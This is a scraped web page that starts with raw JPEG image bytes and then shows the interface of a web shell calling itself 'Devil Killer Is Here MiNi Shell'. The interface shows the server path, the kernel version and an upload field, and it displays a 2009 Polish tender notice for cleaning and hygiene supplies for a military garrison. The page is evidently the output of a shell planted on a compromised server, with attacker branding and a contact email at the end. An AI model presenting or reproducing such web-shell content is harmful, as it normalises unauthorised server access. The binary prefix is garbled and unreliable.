JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/41614-N-2009.html

<p class="kh_header"><b>Brzeg: Zakup  środków  gospodarczych,  higieny  i  konserwacji, na  potrzeby  jednostek  i  instytucji  wojskowych  Garnizonu  Brzeg  - CPV 18420000-9; 18424300-0; 18930000-7; 22452000-7; 22600000-6; 24452000-7; 33711900-6;  33741000-6;  33741100-7;  33763000-6;  33764000-3;  33770000-8; 39224320-7; 39224330-0;
39513100-2;  39525600-4;  39541130-6;  39812200-9; 39813000-4; 39822000-0;  39831000-6;  39832000-3;  44174000-0;  44424200-0</b><br>
<b>Numer ogłoszenia: 41614 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 2697 Brzeg , ul. Sikorskiego 6, 49-300 Brzeg, woj. opolskie, tel. 077 4117313, faks 077 4117218, 4117313.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1brygada.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.1brygada.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup  środków  gospodarczych,  higieny  i  konserwacji, na  potrzeby  jednostek  i  instytucji  wojskowych  Garnizonu  Brzeg  - CPV 18420000-9; 18424300-0; 18930000-7; 22452000-7; 22600000-6; 24452000-7; 33711900-6;  33741000-6;  33741100-7;  33763000-6;  33764000-3;  33770000-8; 39224320-7; 39224330-0;
39513100-2;  39525600-4;  39541130-6;  39812200-9; 39813000-4; 39822000-0;  39831000-6;  39832000-3;  44174000-0;  44424200-0.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I.  -  Środki  higieny  i  konserwacji :

1. Środek  do  mycia  rąk  ze  ścierniwem,  typu  pasta  BHP- równorzędny 
   ( pasta /emulsja ),  opakowanie  po  500g   -  3.800 kg;

2. Mydło  toaletowe  z  prowitaminą   A+E , 
    opakowanie  po  100g   - 1.400 kg;

3. Krem  ochronny  do  rąk  typu  NIVEA - równorzędny,
    opakowanie  po  50g   - 9.000 szt.;

4. Proszek  do  prania  w  pralkach  automatycznych,
   opakowanie  po 100g  -  400 kg;

5. Środek  antybakteryjny  do  dezynfekcji  obuwia,  typu  INDICIN  
    - równorzędny,  opakowanie  po 350 ml  z  atomizerem   - 50 szt.;

6. Pasta  do  obuwia  - czarna  typu  ARA  -  równorzędna,
    opakowanie  po  40g   - 150 kg;

7. Środek  przeciw  molom, typu  NAFTALINA - równorzędny,
    opakowanie  po  160g 	 - 250 kg;

8. Taśma  magazynowa  samoprzylepna  PCV,  typu  SOLVENT - równorzędna, 
    szer. taśmy 4,8 - 5,0 mm,  długość na  krążku  60-65 mb - 200 szt.;

9. Tusz  do  cechownia  tkanin  czerwony  niespieralny,  
    opakowanie  po  1 L   - 2 L;

10. Sznurek  polipropylenowy 
     opakowanie - motek ( kłębek )  po  4 kg    - 20 szt.


CZĘŚĆ  II.  -  Środki  gospodarcze :

11. Mleczko  do  czyszczenia  przedmiotów  ze  stali  nierdzewnej,
     opakowanie  po  0,5 L  - 80 L;

12. Worki  na  śmieci  LDPE  60 L,
     opakowanie  po 50 szt.   - 400 opak.;

13. Worki  na  śmieci  LDPE  120 L,
     opakowanie  po 25 szt.  - 300 opak.;

14. Ściągaczka  gumowa  wraz  z  kijem,  min.  szer. 
     ściągaczki  45 cm  - 15 szt.;

15. Ściągaczka  gumowa  wraz  z  kijem,  min.  szer. 
     ściągaczki  80 cm  - 15 szt.;

16. Papier  pakowy  biały - półpergamin 
     format  A0   -  50 kg;

17. Proszek  do  szorowania  z  aktywnym  tlenem  typu  PER  AKTIV 
     - równorzędny,  w  opakowaniu  po  1 kg  -50 kg;

18. Fartuch  kuchenny  ochronny,  gumowy
     gruby  - 50 szt.;

19. Druciaki  metalowe  do  naczyń,  duże 
     min.  O 13 cm	- 300 szt.;

20. Obrus  ceratowy  gruby,  o  wym.  min.  
     140 cm  x  140 cm  - 300 szt.;

21. Worki  foliowe  o  wymiarach  min. 14 cm  x 4 cm x 26 cm,
     w opakowaniu  po  1000 szt.   - 100 opak.;

22. Rękawiczki  foliowe  jednorazowe,
     w opakowaniu  po  100 szt.  - 200 opak.;

23. Reklamówki  jednorazowe   foliowe  o  wymiarach  min. 
     30 cm x 8 cm x 55 cm, w opakowaniu  po 200 szt.  - 40 opak.;

24. Folia  do  żywności  na  rolce  o  szer.  min.  300 mm,  
     na  rolce  min.  10 mb   - 50 rolek;

25. Serwetki  gastronomiczne  białe  o  wymiarach  min.  15 cm x 15 cm, 
     w opakowaniach  po  500 szt. - 600 opak.;

26. Ścierki  do  mycia  naczyń   o  wymiarach  min. 
     38 cm x 32 cm  - 1000 szt.;

27. Ręcznik  kuchenny  dwuwarstwowy  biały, 
     min. 50  listków  na  rolce   - 1500 rolek;

28. Gąbki  do  mycia  o  wymiarach  min.  
     15 cm x 7 cm x 4,5 cm	- 400 szt.;

29. Środek  do  mycia  i  konserwacji  stali nierdzewnej,  
      w  opakowaniu  po  3-5 L   - 50 L;

30. Płyn  do  usuwania  przypaleń  ze  spryskiwaczem,  
      w  opakowaniu  po 3-5 L    - 40 L;

31. Płyn  do  usuwania  osadów  mineralnych, 
     w opakowaniu  po  3-5 L   - 80 L;

32. Płyn  myjąco-dezynfekujący
     w  opakowaniu  po  3-5 L  - 100 L;

33. Mydło  w  płynie  antybakteryjne -  typu  FAVOLA  B - równorzędne,
     w opakowaniu  po  3-5 L   - 150 L;

34. Skoncentrowany  płyn  do  ręcznego  mycia  naczyń  -  typu  LUDWIK 
     - równorzędny,  w opakowaniu  po  3-5 L   - 400 L;

35. Kwaśny  płyn  do  mycia  i  dezynfekcji, 
     w  opakowaniu  po  3-5 L    - 100 L;

36. Reklamówki  jednorazowe  foliowe  o  wymiarach  min. 
     25 cm x 6 cm x 45 cm,  w  opakowaniu  po  200 szt.  - 20 opak.;

37. Płyn  do  higienicznej  dezynfekcji  rąk,  typu  RUTISEPT  EXTRA  
     - równorzędny,  w opakowaniu  po  1-5 L   - 50 L ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.42.00.00-9, 18.42.43.00-0, 18.93.00.00-7, 22.45.20.00-7, 22.60.00.00-6, 24.45.20.00-7, 33.71.19.00-6, 33.74.41.00-6, 33.74.11.00-7, 33.76.30.00-6, 33.76.40.00-3, 33.77.00.00-8, 39.22.42.20-7, 39.22.43.30-0, 39.51.31.00-2, 39.52.56.00-4, 39.54.11.30-6, 39.81.22.00-9, 39.81.30.00-4, 44.17.40.00-0, 44.42.42.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  żąda  od  Wykonawców  wniesienia  wadium  ( zgodnie  z  postanowieniem  art. 45 ustawy  p.z.p. , w  jednej  lub  kilku  formach,  oraz  według  uznania Wykonawcy ), w  wysokości 2.373,00 PLN  za  całość  zamówienia (tj.  Cz. I.  +  Cz. II.  zamówienia)  lub  za  każdą  z  części  zamówienia  z  osobna  w  wysokości :  Cz. I -  1.635,00 PLN ;  Cz. II  -  738,00 PLN . 
Wniesienia  wadium  należy  dokonać  przelewem,  do  NBP  Oddział  Okręgowy  Opole,  na  rachunek  bankowy  Zamawiającego  o  numerze  konta  24 1010 1401  
0011  9513  9120  0000 .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W  przetargu  mogą  uczestniczyć  Wykonawcy  spełniający  warunki  zawarte  w  art. 22 ust. 1  i  nie  podlegający  wykluczeni  na  podstawie  art. 24  ust. 1 i 2  ustawy  z  dnia  29 stycznia  2004 r. Prawo  zamówień  publicznych ( Dz. U.  Nr 19  poz. 177  z  póź.  zm.), spełniający  warunki  określone  w  specyfikacji  istotnych  warunków  zamówienia  (siwz)  oraz  złożą  wymagane  nią  dokumenty .

Ocena  spełniania  przez  Wykonawcę  warunków  udziału  w  postępowaniu,  będzie  dokonana  w  oparciu  o  złożone  oświadczenia  i  dokumenty,  wymienione  w  pkt. 1  ppkt. 1) a - c  niniejszego  ogłoszenia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Potwierdzenie  warunków  udziału  w  postępowaniu .

     1) W  celu  potwierdzenia,  że  :

     a) Wykonawca  posiada  uprawnienia  do  wykonywania  określonej działalności 
         lub  czynności  oraz  nie  podlega  wykluczeniu  z  postępowania  na 
         podstawie  art. 24  ustawy  p.z.p.,  Zamawiający  będzie  żądał  
         następujących  dokumentów :

- Aktualnego  odpisu  z  właściwego  Krajowego  Rejestru  Sądowego  lub  aktualnego  zaświadczenia  o  wpisie  do  Ewidencji  Działalności  Gospodarczej,  potwierdzającego,  że  profil  działalności  Wykonawcy  odpowiada  przedmiotowi  zamówienia .
	
- Aktualnego  zaświadczenia  właściwego  naczelnika  Urzędu  Skarbowego,  potwierdzającego  że  Wykonawca  nie  zalega  w  uiszczaniu  podatków 
i  opłat  lub  zaświadczenie,  że  Wykonawca  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu . 

- Aktualnego  zaświadczenia  właściwego  oddziału  Zakładu  Ubezpieczeń  Społecznych  lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego,
potwierdzającego,  że  Wykonawca  nie  zalega  w  opłacaniu  składek  na  ubezpieczenie  zdrowotne  i  społeczne  lub  zaświadczenie,  że  Wykonawca  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu . 

- Oświadczenia  o  spełnianiu  warunków  udziału  w  postępowaniu  ( art. 22  ust. 1  i art. 24  ust. 1 i 2  ustawy  p.z.p. )	

       b) Wykonawca  posiada  niezbędną  wiedzę  i  doświadczenie  oraz 
           dysponuje  potencjałem  technicznym  i  osobami  zdolnymi  do 
           wykonywania  zamówienia,  Zamawiający  będzie żądał  następujących  
           dokumentów :

- Wykazu  Nr 1 - wykaz  zrealizowanych  w  latach  2006-2008  zamówień  na  dostawy,  podobne  do  przedmiotu  zamówienia,  potwierdzonych  załączonymi  do  niego  rekomendacjami,  na  każdą  wpisaną  do  niego  pozycję .

- Wpisy  do  Krajowego  Rejestru  Kosmetyków - dotyczą  wyłącznie  asortymentu  wymienionego  w  Załączniku  Nr  3-1a,  od  których   są  one  wymagane  przez  Zamawiającego .

- Karty  Charakterystyki  - dotyczą  wyłącznie  asortymentu  wymienionego  w  Załącznikach  Nr  3-1a  i  3-1b,  od  których  SA  one  wymagane  przez  Zamawiającego .	

- Jeden  z  wymienionych  dokumentów :  Atest  / Opinia / Świadectwo jakości zdrowotnej  PZH lub innego niezależnego laboratorium - dotyczy  wyłącznie  asortymentu  wymienionego  w  Załączniku 3-1b,  od  których  są  one  wymagane  przez  Zamawiającego .	

        c) Wykonawca  znajduje  się  w  sytuacji  ekonomicznej  i  finansowej,  
           zapewniającej  wykonanie  zamówienia,  Zamawiający  będzie  żądał  
           następujących  dokumentów :

- Polisy  lub  innego  dokumentu  ubezpieczenia  od  odpowiedzialności  cywilnej,  w  związku  z  prowadzoną  działalnością  gospodarczą . 	


2) Ponadto,  Zamawiający  będzie  żądał  od  Wykonawcy  złożenia  
    następujących  dokumentów :

- Formularza  oferty  wraz  z  jego  załącznikami,  tj.  Opisem  przedmiotu  zamówienia - Arkuszem  cenowym - Załącznik  Nr 3-1;  Wymaganiami  technicznymi  dla  Cz. I. i II.  zamówienia - Załączniki  Nr 3-1a  i  3-1b .

- Wypełnionego  i  parafowanego  przez  uprawnionego  do  reprezentowania  i  zaciągania  zobowiązań  przedstawiciela  Wykonawcy,  Projektu  umowy.  

- Pełnomocnictwa  do  podpisania  oferty  ( tylko  w  przypadku  jej  podpisania  przez  osobę  nie  uprawnioną  do  zaciągania  zobowiązań  w  imieniu  Wykonawcy,  nie  wymienioną  w  KRS  lub  EDG ),  w  formie  oryginału  potwierdzonego  przez  osobę  uprawnioną  do  zaciągania  zobowiązań  
w  imieniu  Wykonawcy  lub  kserokopii  udzielonego   wcześniej pełnomocnictwa,  potwierdzonej  notarialnie .  	

- Oryginał  lub  poświadczona  kserokopia  dowodu  dokonania  wpłaty  wadium  uczestnictwa  w  postępowaniu ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Termin  realizacji - 5</li>
<li>3 - Gwarancje - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.1brygada.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można otrzymać odpłatnie (12,00 zl.), pocztą lub pobrać osobiście w JW2697
Brzeg (bud. nr2, pok. nr9) po wcześniejszym dokonaniu płatności za jej udostępnie-nie (tylko za wersję wydrukowaną)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 09:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, tj. w kancelarii jawnej (bud. nr2 pok. Nr137), w JW2697 Brzeg, ul. Sikorskiego 6, 49-300 Brzeg, do dnia 09.02.2009  r. do godz. 09.00 ..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -----------.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Środki  higieny  i  konserwacji.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I.  -  Środki  higieny  i  konserwacji :

1. Środek  do  mycia  rąk  ze  ścierniwem,  typu  pasta  BHP- równorzędny 
   ( pasta /emulsja ),  opakowanie  po  500g   -  3.800 kg;

2. Mydło  toaletowe  z  prowitaminą   A+E , 
    opakowanie  po  100g   - 1.400 kg;

3. Krem  ochronny  do  rąk  typu  NIVEA - równorzędny,
    opakowanie  po  50g   - 9.000 szt.;

4. Proszek  do  prania  w  pralkach  automatycznych,
   opakowanie  po 100g  -  400 kg;

5. Środek  antybakteryjny  do  dezynfekcji  obuwia,  typu  INDICIN  
    - równorzędny,  opakowanie  po 350 ml  z  atomizerem   - 50 szt.;

6. Pasta  do  obuwia  - czarna  typu  ARA  -  równorzędna,
    opakowanie  po  40g   - 150 kg;

7. Środek  przeciw  molom, typu  NAFTALINA - równorzędny,
    opakowanie  po  160g 	 - 250 kg;

8. Taśma  magazynowa  samoprzylepna  PCV,  typu  SOLVENT - równorzędna, 
    szer. taśmy 4,8 - 5,0 mm,  długość na  krążku  60-65 mb - 200 szt.;

9. Tusz  do  cechownia  tkanin  czerwony  niespieralny,  
    opakowanie  po  1 L   - 2 L;

10. Sznurek  polipropylenowy 
     opakowanie - motek ( kłębek )  po  4 kg    - 20 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.50.00-8, 22.60.00.00-6, 24.45.20.00-7, 33.71.19.00-6, 33.74.10.00-6, 33.74.11.00-7, 39.54.11.30-6, 39.81.22.00-9, 39.83.10.00-6, 44.42.42.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji - 5</li>
<li>3. Gwarancje - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Środki  gospodarcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ  II.  -  Środki  gospodarcze :

11. Mleczko  do  czyszczenia  przedmiotów  ze  stali  nierdzewnej,
     opakowanie  po  0,5 L  - 80 L;

12. Worki  na  śmieci  LDPE  60 L,
     opakowanie  po 50 szt.   - 400 opak.;

13. Worki  na  śmieci  LDPE  120 L,
     opakowanie  po 25 szt.  - 300 opak.;

14. Ściągaczka  gumowa  wraz  z  kijem,  min.  szer. 
     ściągaczki  45 cm  - 15 szt.;

15. Ściągaczka  gumowa  wraz  z  kijem,  min.  szer. 
     ściągaczki  80 cm  - 15 szt.;

16. Papier  pakowy  biały - półpergamin 
     format  A0   -  50 kg;

17. Proszek  do  szorowania  z  aktywnym  tlenem  typu  PER  AKTIV 
     - równorzędny,  w  opakowaniu  po  1 kg  -50 kg;

18. Fartuch  kuchenny  ochronny,  gumowy
     gruby  - 50 szt.;

19. Druciaki  metalowe  do  naczyń,  duże 
     min.  O 13 cm	- 300 szt.;

20. Obrus  ceratowy  gruby,  o  wym.  min.  
     140 cm  x  140 cm  - 300 szt.;

21. Worki  foliowe  o  wymiarach  min. 14 cm  x 4 cm x 26 cm,
     w opakowaniu  po  1000 szt.   - 100 opak.;

22. Rękawiczki  foliowe  jednorazowe,
     w opakowaniu  po  100 szt.  - 200 opak.;

23. Reklamówki  jednorazowe   foliowe  o  wymiarach  min. 
     30 cm x 8 cm x 55 cm, w opakowaniu  po 200 szt.  - 40 opak.;

24. Folia  do  żywności  na  rolce  o  szer.  min.  300 mm,  
     na  rolce  min.  10 mb   - 50 rolek;

25. Serwetki  gastronomiczne  białe  o  wymiarach  min.  15 cm x 15 cm, 
     w opakowaniach  po  500 szt. - 600 opak.;

26. Ścierki  do  mycia  naczyń   o  wymiarach  min. 
     38 cm x 32 cm  - 1000 szt.;

27. Ręcznik  kuchenny  dwuwarstwowy  biały, 
     min. 50  listków  na  rolce   - 1500 rolek;

28. Gąbki  do  mycia  o  wymiarach  min.  
     15 cm x 7 cm x 4,5 cm	- 400 szt.;

29. Środek  do  mycia  i  konserwacji  stali nierdzewnej,  
      w  opakowaniu  po  3-5 L   - 50 L;

30. Płyn  do  usuwania  przypaleń  ze  spryskiwaczem,  
      w  opakowaniu  po 3-5 L    - 40 L;

31. Płyn  do  usuwania  osadów  mineralnych, 
     w opakowaniu  po  3-5 L   - 80 L;

32. Płyn  myjąco-dezynfekujący
     w  opakowaniu  po  3-5 L  - 100 L;

33. Mydło  w  płynie  antybakteryjne -  typu  FAVOLA  B - równorzędne,
     w opakowaniu  po  3-5 L   - 150 L;

34. Skoncentrowany  płyn  do  ręcznego  mycia  naczyń  -  typu  LUDWIK 
     - równorzędny,  w opakowaniu  po  3-5 L   - 400 L;

35. Kwaśny  płyn  do  mycia  i  dezynfekcji, 
     w  opakowaniu  po  3-5 L    - 100 L;

36. Reklamówki  jednorazowe  foliowe  o  wymiarach  min. 
     25 cm x 6 cm x 45 cm,  w  opakowaniu  po  200 szt.  - 20 opak.;

37. Płyn  do  higienicznej  dezynfekcji  rąk,  typu  RUTISEPT  EXTRA  
     - równorzędny,  w opakowaniu  po  1-5 L   - 50 L ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.00.00-9, 18.42.43.00-0, 18.93.00.00-7, 33.76.30.00-6, 33.76.40.00-3, 33.77.00.00-8, 39.22.43.20-7, 39.22.43.30-0, 39.51.31.00-2, 39.52.56.00-4, 39.81.13.00-0, 39.82.22.00-0, 39.83.20.00-3, 44.17.40.00-0, 44.42.42.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin  realizacji - 5</li>
<li>3. Gwarancje - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com